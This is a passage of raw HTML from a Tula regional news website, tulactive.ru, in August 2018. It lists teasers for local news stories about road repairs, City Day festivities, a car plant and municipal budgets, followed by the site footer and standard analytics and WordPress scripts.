            <div class="td-module-thumb"><a href="http://tulactive.ru/news/109226" rel="bookmark" title="Дюмин призвал глав муниципалитетов расставлять приоритеты при выборе дорог для ремонта"><img width="80" height="60" class="entry-thumb" src="http://tulactive.ru/wp-content/uploads/2018/08/Djumin_doroga_1-80x60.jpg" srcset="http://tulactive.ru/wp-content/uploads/2018/08/Djumin_doroga_1-80x60.jpg 80w, http://tulactive.ru/wp-content/uploads/2018/08/Djumin_doroga_1-300x225.jpg 300w, http://tulactive.ru/wp-content/uploads/2018/08/Djumin_doroga_1-768x576.jpg 768w, http://tulactive.ru/wp-content/uploads/2018/08/Djumin_doroga_1-265x198.jpg 265w, http://tulactive.ru/wp-content/uploads/2018/08/Djumin_doroga_1-696x522.jpg 696w, http://tulactive.ru/wp-content/uploads/2018/08/Djumin_doroga_1-560x420.jpg 560w, http://tulactive.ru/wp-content/uploads/2018/08/Djumin_doroga_1.jpg 800w" sizes="(max-width: 80px) 100vw, 80px" alt="" title="Дюмин призвал глав муниципалитетов расставлять приоритеты при выборе дорог для ремонта"/></a></div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://tulactive.ru/news/109226" rel="bookmark" title="Дюмин призвал глав муниципалитетов расставлять приоритеты при выборе дорог для ремонта">Дюмин призвал глав муниципалитетов расставлять приоритеты при выборе дорог для ремонта</a></h3>                <div class="td-module-meta-info">
                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-08-08T22:38:48+00:00" >08.08.2018</time></span>                                    </div>
            </div>

        </div>

        
        <div class="td_module_mx2 td_module_wrap td-animation-stack">

            <div class="td-module-thumb"><a href="http://tulactive.ru/news/109212" rel="bookmark" title="Туляков в День города накормят жареной картошкой со сковороды и 10-метровыми пирогами"><img width="80" height="60" class="entry-thumb" src="http://tulactive.ru/wp-content/uploads/2018/08/kartoshka_skovoroda-80x60.jpg" srcset="http://tulactive.ru/wp-content/uploads/2018/08/kartoshka_skovoroda-80x60.jpg 80w, http://tulactive.ru/wp-content/uploads/2018/08/kartoshka_skovoroda-300x225.jpg 300w, http://tulactive.ru/wp-content/uploads/2018/08/kartoshka_skovoroda-768x576.jpg 768w, http://tulactive.ru/wp-content/uploads/2018/08/kartoshka_skovoroda-265x198.jpg 265w, http://tulactive.ru/wp-content/uploads/2018/08/kartoshka_skovoroda-696x522.jpg 696w, http://tulactive.ru/wp-content/uploads/2018/08/kartoshka_skovoroda-560x420.jpg 560w, http://tulactive.ru/wp-content/uploads/2018/08/kartoshka_skovoroda.jpg 800w" sizes="(max-width: 80px) 100vw, 80px" alt="" title="Туляков в День города накормят жареной картошкой со сковороды и 10-метровыми пирогами"/></a></div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://tulactive.ru/news/109212" rel="bookmark" title="Туляков в День города накормят жареной картошкой со сковороды и 10-метровыми пирогами">Туляков в День города накормят жареной картошкой со сковороды и 10-метровыми пирогами</a></h3>                <div class="td-module-meta-info">
                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-08-08T19:22:57+00:00" >08.08.2018</time></span>                                    </div>
            </div>

        </div>

        
        <div class="td_module_mx2 td_module_wrap td-animation-stack">

            <div class="td-module-thumb"><a href="http://tulactive.ru/news/109122" rel="bookmark" title="Автозаводу Great Wall в Узловой на полмиллиарда рублей обеспечат дополнительную мощность"><img width="80" height="60" class="entry-thumb" src="http://tulactive.ru/wp-content/uploads/2017/03/haval-80x60.jpg" srcset="http://tulactive.ru/wp-content/uploads/2017/03/haval-80x60.jpg 80w, http://tulactive.ru/wp-content/uploads/2017/03/haval-300x225.jpg 300w, http://tulactive.ru/wp-content/uploads/2017/03/haval-768x576.jpg 768w, http://tulactive.ru/wp-content/uploads/2017/03/haval-265x198.jpg 265w, http://tulactive.ru/wp-content/uploads/2017/03/haval-696x522.jpg 696w, http://tulactive.ru/wp-content/uploads/2017/03/haval-560x420.jpg 560w, http://tulactive.ru/wp-content/uploads/2017/03/haval.jpg 800w" sizes="(max-width: 80px) 100vw, 80px" alt="" title="Автозаводу Great Wall в Узловой на полмиллиарда рублей обеспечат дополнительную мощность"/></a></div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://tulactive.ru/news/109122" rel="bookmark" title="Автозаводу Great Wall в Узловой на полмиллиарда рублей обеспечат дополнительную мощность">Автозаводу Great Wall в Узловой на полмиллиарда рублей обеспечат дополнительную мощность</a></h3>                <div class="td-module-meta-info">
                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-08-08T18:37:35+00:00" >08.08.2018</time></span>                                    </div>
            </div>

        </div>

        
        <div class="td_module_mx2 td_module_wrap td-animation-stack">

            <div class="td-module-thumb"><a href="http://tulactive.ru/news/109133" rel="bookmark" title="За самовольным занятием земель в Тульской области проследит &laquo;Геоскан&raquo;"><img width="80" height="60" class="entry-thumb" src="http://tulactive.ru/wp-content/uploads/2018/08/geoskan-80x60.jpg" srcset="http://tulactive.ru/wp-content/uploads/2018/08/geoskan-80x60.jpg 80w, http://tulactive.ru/wp-content/uploads/2018/08/geoskan-300x225.jpg 300w, http://tulactive.ru/wp-content/uploads/2018/08/geoskan-768x576.jpg 768w, http://tulactive.ru/wp-content/uploads/2018/08/geoskan-265x198.jpg 265w, http://tulactive.ru/wp-content/uploads/2018/08/geoskan-696x522.jpg 696w, http://tulactive.ru/wp-content/uploads/2018/08/geoskan-560x420.jpg 560w, http://tulactive.ru/wp-content/uploads/2018/08/geoskan.jpg 800w" sizes="(max-width: 80px) 100vw, 80px" alt="" title="За самовольным занятием земель в Тульской области проследит &laquo;Геоскан&raquo;"/></a></div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://tulactive.ru/news/109133" rel="bookmark" title="За самовольным занятием земель в Тульской области проследит &laquo;Геоскан&raquo;">За самовольным занятием земель в Тульской области проследит &laquo;Геоскан&raquo;</a></h3>                <div class="td-module-meta-info">
                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-08-08T17:25:36+00:00" >08.08.2018</time></span>                                    </div>
            </div>

        </div>

        
        <div class="td_module_mx2 td_module_wrap td-animation-stack">

            <div class="td-module-thumb"><a href="http://tulactive.ru/news/109187" rel="bookmark" title="Плитку в центре Тулы за 22 млн рублей меняет младший Прокопук"><img width="80" height="60" class="entry-thumb" src="http://tulactive.ru/wp-content/uploads/2018/08/plitka_lamma_1-80x60.jpg" srcset="http://tulactive.ru/wp-content/uploads/2018/08/plitka_lamma_1-80x60.jpg 80w, http://tulactive.ru/wp-content/uploads/2018/08/plitka_lamma_1-300x225.jpg 300w, http://tulactive.ru/wp-content/uploads/2018/08/plitka_lamma_1-768x576.jpg 768w, http://tulactive.ru/wp-content/uploads/2018/08/plitka_lamma_1-265x198.jpg 265w, http://tulactive.ru/wp-content/uploads/2018/08/plitka_lamma_1-696x522.jpg 696w, http://tulactive.ru/wp-content/uploads/2018/08/plitka_lamma_1-560x420.jpg 560w, http://tulactive.ru/wp-content/uploads/2018/08/plitka_lamma_1.jpg 800w" sizes="(max-width: 80px) 100vw, 80px" alt="" title="Плитку в центре Тулы за 22 млн рублей меняет младший Прокопук"/></a></div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://tulactive.ru/news/109187" rel="bookmark" title="Плитку в центре Тулы за 22 млн рублей меняет младший Прокопук">Плитку в центре Тулы за 22 млн рублей меняет младший Прокопук</a></h3>                <div class="td-module-meta-info">
                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-08-08T16:13:35+00:00" >08.08.2018</time></span>                                    </div>
            </div>

        </div>

        
        <div class="td_module_mx2 td_module_wrap td-animation-stack">

            <div class="td-module-thumb"><a href="http://tulactive.ru/news/109129" rel="bookmark" title="Заокский остался без ФОКа из-за нехватки денег"><img width="80" height="60" class="entry-thumb" src="http://tulactive.ru/wp-content/uploads/2018/08/Bibikov-80x60.jpg" srcset="http://tulactive.ru/wp-content/uploads/2018/08/Bibikov-80x60.jpg 80w, http://tulactive.ru/wp-content/uploads/2018/08/Bibikov-300x225.jpg 300w, http://tulactive.ru/wp-content/uploads/2018/08/Bibikov-768x576.jpg 768w, http://tulactive.ru/wp-content/uploads/2018/08/Bibikov-265x198.jpg 265w, http://tulactive.ru/wp-content/uploads/2018/08/Bibikov-696x522.jpg 696w, http://tulactive.ru/wp-content/uploads/2018/08/Bibikov-560x420.jpg 560w, http://tulactive.ru/wp-content/uploads/2018/08/Bibikov.jpg 800w" sizes="(max-width: 80px) 100vw, 80px" alt="" title="Заокский остался без ФОКа из-за нехватки денег"/></a></div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://tulactive.ru/news/109129" rel="bookmark" title="Заокский остался без ФОКа из-за нехватки денег">Заокский остался без ФОКа из-за нехватки денег</a></h3>                <div class="td-module-meta-info">
                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-08-08T15:09:46+00:00" >08.08.2018</time></span>                                    </div>
            </div>

        </div>

        
        <div class="td_module_mx2 td_module_wrap td-animation-stack">

            <div class="td-module-thumb"><a href="http://tulactive.ru/news/109139" rel="bookmark" title="В Тульской области оценят свыше 2 млн объектов недвижимости"><img width="80" height="60" class="entry-thumb" src="http://tulactive.ru/wp-content/uploads/2016/05/kadastr-80x60.jpg" srcset="http://tulactive.ru/wp-content/uploads/2016/05/kadastr-80x60.jpg 80w, http://tulactive.ru/wp-content/uploads/2016/05/kadastr-300x225.jpg 300w, http://tulactive.ru/wp-content/uploads/2016/05/kadastr-768x576.jpg 768w, http://tulactive.ru/wp-content/uploads/2016/05/kadastr-265x198.jpg 265w, http://tulactive.ru/wp-content/uploads/2016/05/kadastr-696x522.jpg 696w, http://tulactive.ru/wp-content/uploads/2016/05/kadastr-560x420.jpg 560w, http://tulactive.ru/wp-content/uploads/2016/05/kadastr.jpg 800w" sizes="(max-width: 80px) 100vw, 80px" alt="" title="В Тульской области оценят свыше 2 млн объектов недвижимости"/></a></div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://tulactive.ru/news/109139" rel="bookmark" title="В Тульской области оценят свыше 2 млн объектов недвижимости">В Тульской области оценят свыше 2 млн объектов недвижимости</a></h3>                <div class="td-module-meta-info">
                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-08-08T13:54:23+00:00" >08.08.2018</time></span>                                    </div>
            </div>

        </div>

        
        <div class="td_module_mx2 td_module_wrap td-animation-stack">

            <div class="td-module-thumb"><a href="http://tulactive.ru/news/109127" rel="bookmark" title="Шевченко: Тульская область готова к зиме на 63%"><img width="80" height="60" class="entry-thumb" src="http://tulactive.ru/wp-content/uploads/2018/08/Shevchenko-80x60.jpg" srcset="http://tulactive.ru/wp-content/uploads/2018/08/Shevchenko-80x60.jpg 80w, http://tulactive.ru/wp-content/uploads/2018/08/Shevchenko-300x225.jpg 300w, http://tulactive.ru/wp-content/uploads/2018/08/Shevchenko-768x576.jpg 768w, http://tulactive.ru/wp-content/uploads/2018/08/Shevchenko-265x198.jpg 265w, http://tulactive.ru/wp-content/uploads/2018/08/Shevchenko-696x522.jpg 696w, http://tulactive.ru/wp-content/uploads/2018/08/Shevchenko-560x420.jpg 560w, http://tulactive.ru/wp-content/uploads/2018/08/Shevchenko.jpg 800w" sizes="(max-width: 80px) 100vw, 80px" alt="" title="Шевченко: Тульская область готова к зиме на 63%"/></a></div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://tulactive.ru/news/109127" rel="bookmark" title="Шевченко: Тульская область готова к зиме на 63%">Шевченко: Тульская область готова к зиме на 63%</a></h3>                <div class="td-module-meta-info">
                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-08-08T12:41:22+00:00" >08.08.2018</time></span>                                    </div>
            </div>

        </div>

        
        <div class="td_module_mx2 td_module_wrap td-animation-stack">

            <div class="td-module-thumb"><a href="http://tulactive.ru/news/108938" rel="bookmark" title="Раздельный сбор мусора в России будут налаживать десять лет"><img width="80" height="60" class="entry-thumb" src="http://tulactive.ru/wp-content/uploads/2018/08/musor_16-80x60.jpg" srcset="http://tulactive.ru/wp-content/uploads/2018/08/musor_16-80x60.jpg 80w, http://tulactive.ru/wp-content/uploads/2018/08/musor_16-300x225.jpg 300w, http://tulactive.ru/wp-content/uploads/2018/08/musor_16-768x576.jpg 768w, http://tulactive.ru/wp-content/uploads/2018/08/musor_16-265x198.jpg 265w, http://tulactive.ru/wp-content/uploads/2018/08/musor_16-696x522.jpg 696w, http://tulactive.ru/wp-content/uploads/2018/08/musor_16-560x420.jpg 560w, http://tulactive.ru/wp-content/uploads/2018/08/musor_16.jpg 800w" sizes="(max-width: 80px) 100vw, 80px" alt="" title="Раздельный сбор мусора в России будут налаживать десять лет"/></a></div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://tulactive.ru/news/108938" rel="bookmark" title="Раздельный сбор мусора в России будут налаживать десять лет">Раздельный сбор мусора в России будут налаживать десять лет</a></h3>                <div class="td-module-meta-info">
                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-08-07T19:42:07+00:00" >07.08.2018</time></span>                                    </div>
            </div>

        </div>

        
        <div class="td_module_mx2 td_module_wrap td-animation-stack">

            <div class="td-module-thumb"><a href="http://tulactive.ru/news/108895" rel="bookmark" title="В ОНФ призвали региональных чиновников мотивировать жителей питаться качественней"><img width="80" height="60" class="entry-thumb" src="http://tulactive.ru/wp-content/uploads/2018/08/eda_5-80x60.jpg" srcset="http://tulactive.ru/wp-content/uploads/2018/08/eda_5-80x60.jpg 80w, http://tulactive.ru/wp-content/uploads/2018/08/eda_5-300x225.jpg 300w, http://tulactive.ru/wp-content/uploads/2018/08/eda_5-768x576.jpg 768w, http://tulactive.ru/wp-content/uploads/2018/08/eda_5-265x198.jpg 265w, http://tulactive.ru/wp-content/uploads/2018/08/eda_5-696x522.jpg 696w, http://tulactive.ru/wp-content/uploads/2018/08/eda_5-560x420.jpg 560w, http://tulactive.ru/wp-content/uploads/2018/08/eda_5.jpg 800w" sizes="(max-width: 80px) 100vw, 80px" alt="" title="В ОНФ призвали региональных чиновников мотивировать жителей питаться качественней"/></a></div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://tulactive.ru/news/108895" rel="bookmark" title="В ОНФ призвали региональных чиновников мотивировать жителей питаться качественней">В ОНФ призвали региональных чиновников мотивировать жителей питаться качественней</a></h3>                <div class="td-module-meta-info">
                                                            <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2018-08-07T18:38:12+00:00" >07.08.2018</time></span>                                    </div>
            </div>

        </div>

        </div></div> <!-- ./block -->                            </div>
                        </div>
                            </div> <!-- /.td-pb-row -->
    </div> <!-- /.td-container -->
</div> <!-- /.td-main-content-wrap -->

<!-- Instagram -->



<!-- Footer -->
<div class="td-footer-wrapper">
    <div class="td-container">

	    <div class="td-pb-row">
		    <div class="td-pb-span12">
                		    </div>
	    </div>

        <div class="td-pb-row">

            <div class="td-pb-span8">
                <aside class="td_block_template_8 widget widget_text">			<div class="textwidget"><p>© Tulactive.ru | Тула активная, 2018. При цитировании материалов гиперссылка на сайт обязательна. Мнение авторов может не совпадать с позицией редакции.</p>
</div>
		</aside>            </div>

            <div class="td-pb-span4">
                <aside class="widget_text td_block_template_8 widget widget_custom_html"><div class="textwidget custom-html-widget"><noindex>
<a href="http://yandex.ru/cy?base=0&amp;host=tulactive.ru" rel="nofollow"><img src="http://www.yandex.ru/cycounter?tulactive.ru" width="88" height="31" alt="Индекс цитирования" border="0" /></a>

<!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='//www.liveinternet.ru/click' "+
"target=_blank><img src='//counter.yadro.ru/hit?t38.6;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet' "+
"border='0' width='31' height='31'><\/a>")
//--></script><!--/LiveInternet-->

<!-- Yandex.Metrika counter -->
<script type="text/javascript" >
    (function (d, w, c) {
        (w[c] = w[c] || []).push(function() {
            try {
                w.yaCounter25227143 = new Ya.Metrika2({
                    id:25227143,
                    clickmap:true,
                    trackLinks:true,
                    accurateTrackBounce:true,
                    webvisor:true
                });
            } catch(e) { }
        });

        var n = d.getElementsByTagName("script")[0],
            s = d.createElement("script"),
            f = function () { n.parentNode.insertBefore(s, n); };
        s.type = "text/javascript";
        s.async = true;
        s.src = "https://mc.yandex.ru/metrika/tag.js";

        if (w.opera == "[object Opera]") {
            d.addEventListener("DOMContentLoaded", f, false);
        } else { f(); }
    })(document, window, "yandex_metrika_callbacks2");
</script>
<noscript><div><img src="https://mc.yandex.ru/watch/25227143" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
	<!-- /Yandex.Metrika counter --></noindex></div></aside>            </div>

        </div>
    </div>
</div>
<!-- Sub Footer -->
</div><!--close td-outer-wrap-->

	<div style="display:none">
	</div>


    <!--

        Theme: Newspaper by tagDiv 2016
        Version: 7.7 (rara)
        Deploy mode: deploy
        
        uid: 5b6c94d95abe0
    -->

    <script type='text/javascript'>
/* <![CDATA[ */
var wpcf7 = {"apiSettings":{"root":"http:\/\/tulactive.ru\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"recaptcha":{"messages":{"empty":"\u041f\u043e\u0436\u0430\u043b\u0443\u0439\u0441\u0442\u0430, \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u0442\u0435, \u0447\u0442\u043e \u0432\u044b \u043d\u0435 \u0440\u043e\u0431\u043e\u0442."}}};
/* ]]> */
</script>
<script type='text/javascript' src='http://tulactive.ru/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.3'></script>
<script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201832'></script>
<script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?ver=2018Augaa'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var WPGroHo = {"my_hash":""};
/* ]]> */
</script>
<script type='text/javascript' src='http://tulactive.ru/wp-content/plugins/jetpack/modules/wpgroho.js?ver=4.9.8'></script>
<script type='text/javascript' src='http://tulactive.ru/wp-content/themes/Newspaper%207/js/tagdiv_theme.js?ver=7.7'></script>
<script type='text/javascript' src='http://tulactive.ru/wp-includes/js/wp-embed.js?ver=4.9.8'></script>

<!-- JS generated by theme -->

<script>
    

                jQuery().ready(function jQuery_ready() {
                    tdAjaxCount.tdGetViewsCountsAjax("post","[109272]");
                });
            

	

		(function(){
			var html_jquery_obj = jQuery('html');

			if (html_jquery_obj.length && (html_jquery_obj.is('.ie8') || html_jquery_obj.is('.ie9'))) {

				var path = 'http://tulactive.ru/wp-content/themes/Newspaper%207/style.css';

				jQuery.get(path, function(data) {

					var str_split_separator = '#td_css_split_separator';
					var arr_splits = data.split(str_split_separator);
					var arr_length = arr_splits.length;

					if (arr_length > 1) {

						var dir_path = 'http://tulactive.ru/wp-content/themes/Newspaper%207';
						var splited_css = '';

						for (var i = 0; i < arr_length; i++) {
							if (i > 0) {
								arr_splits[i] = str_split_separator + ' ' + arr_splits[i];
							}
							//jQuery('head').append('<style>' + arr_splits[i] + '</style>');

							var formated_str = arr_splits[i].replace(/\surl\(\'(?!data\:)/gi, function regex_function(str) {
								return ' url(\'' + dir_path + '/' + str.replace(/url\(\'/gi, '').replace(/^\s+|\s+$/gm,'');
							});

							splited_css += "<style>" + formated_str + "</style>";
						}

						var td_theme_css = jQuery('link#td-theme-css');

						if (td_theme_css.length) {
							td_theme_css.after(splited_css);
						}
					}
				});
			}
		})();

	
	
</script>

<script type='text/javascript' src='https://stats.wp.com/e-201832.js' async='async' defer='defer'></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:6.4.1',blog:'87376333',post:'109272',tz:'3',srv:'tulactive.ru'} ]);
	_stq.push([ 'clickTrackerInit', '87376333', '109272' ]);
</script>

</body>
</html>